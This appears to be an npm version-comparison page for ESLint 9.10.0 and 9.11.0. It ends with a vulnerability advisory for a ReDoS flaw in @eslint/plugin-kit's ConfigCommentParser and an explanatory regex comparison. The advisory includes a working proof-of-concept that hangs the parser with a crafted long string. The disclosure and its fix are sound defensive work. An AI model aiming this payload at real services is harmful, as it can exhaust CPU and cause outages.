ESLint 9.11.0 and 9.10.0 are recent releases of the popular JavaScript linting tool, designed to help developers maintain code quality and consistency. Both versions share the same core functionality, offering AST-based pattern checking, customizable rules, and extensive integrations with various editors and build tools. However, several key differences might influence a developer's decision when upgrading.
First, reviewing the dependency updates, 9.11.0 includes a bump in @eslint/js from 9.10.0 to 9.11.0 and @eslint/plugin-kit jumps from 0.1.0 to 0.2.0. Also, @eslint/core bumps up from 0.5.0 to 0.6.0. These updates often contain bug fixes, performance improvements, and new features related to ESLint's core functionality and plugin development.
Additionally, there's a change in eslint-release dev dependency from 3.2.2 to 3.3.0. This usually reflects internal tooling upgrades, enhancing the release process.
Developers should also consider the file count and unpacked size. Version 9.11.0 has a file count of 419 and an unpacked size of 3297399 bytes, and was released on 2024-09-20. Version 9.10.0 has a file count of 416 and an unpacked size of 3288062 bytes, and was released on 2024-09-06. These changes might indicate modifications to the codebase, potentially affecting performance or compatibility.
When choosing between versions, developers should prioritize understanding if the updated dependencies directly address any existing issues in their projects, or if the new features will significantly improve their linting workflow. Always review the changelog for a comprehensive understanding of changes. Finally, be aware of the added file size.
All vulnerabilities related to version 9.11.0 of the package
@eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser
The ConfigCommentParser#parseJSONLikeConfig API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument. The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with [^-a-zA-Z0-9/].
// Proof of concept: run `npm i @eslint/plugin-kit@0.3.3` and `node attack.js`.
const { ConfigCommentParser } = require("@eslint/plugin-kit");
// A very long run of characters followed by "?" triggers the quadratic runtime.
const str = `${"A".repeat(1000000)}?: 1 B: 2`;
console.log("start");
const parser = new ConfigCommentParser();
console.log(parser.parseJSONLikeConfig(str));
console.log("end"); // never reached: the program hangs with high CPU usage
This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.
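The following is an added illustration, not code from @eslint/plugin-kit, of why an unanchored grouped key expression goes quadratic on the PoC input above and how the advisory's prefix fix makes it linear. The two regexes are hypothetical stand-ins for the pattern at config-comment-parser.js:158, and the `^|` alternative is an assumption added so that a key at the very start of the input still matches.

```javascript
// Added illustration (not the @eslint/plugin-kit source): two hypothetical
// "quote the key" regexes that mirror the shape the advisory describes.

// Vulnerable shape: the capturing group is not anchored, so with the g flag
// a match may start at every position inside a long run of identifier
// characters. On "AAAA...?: 1 B: 2" each start scans to the "?" before
// failing, so total work grows quadratically with the length of the run.
const UNANCHORED = /([-a-zA-Z0-9\/]+):/gu;

// Hardened shape from the advisory: a non-identifier character must precede
// the group (assumption: "^" is allowed too so a leading key still matches),
// so a match can only begin at the start of a run and the scan is linear.
const ANCHORED = /(^|[^-a-zA-Z0-9\/])([-a-zA-Z0-9\/]+):/gu;

// Rewrite bare keys to JSON-style quoted keys, e.g. `a: 1` -> `"a": 1`.
function quoteKeysUnanchored(str) {
  return str.replace(UNANCHORED, '"$1":');
}
function quoteKeysAnchored(str) {
  return str.replace(ANCHORED, '$1"$2":');
}

// The advisory's PoC input shape, parameterised by the run length.
function poc(n) {
  return `${"A".repeat(n)}?: 1 B: 2`;
}

// Wall-clock milliseconds for one call.
function timeMs(fn, input) {
  const t0 = process.hrtime.bigint();
  fn(input);
  return Number(process.hrtime.bigint() - t0) / 1e6;
}

// How much slower the call gets when the run length doubles:
// roughly 2x for linear behaviour, roughly 4x for quadratic.
function growthRatio(fn, n) {
  const small = timeMs(fn, poc(n));
  const large = timeMs(fn, poc(2 * n));
  return large / Math.max(small, 1e-3);
}

console.log(quoteKeysUnanchored("a: 1, b-c: 2")); // "a": 1, "b-c": 2
console.log(quoteKeysAnchored("a: 1, b-c: 2"));   // "a": 1, "b-c": 2
console.log("unanchored growth ratio:", growthRatio(quoteKeysUnanchored, 4000).toFixed(1));
console.log("anchored growth ratio:", growthRatio(quoteKeysAnchored, 4000).toFixed(1));
```

Both rewrites produce identical output on benign config comments; only their cost on a hostile run of identifier characters differs, which is the property a fix for this class of bug should be tested for.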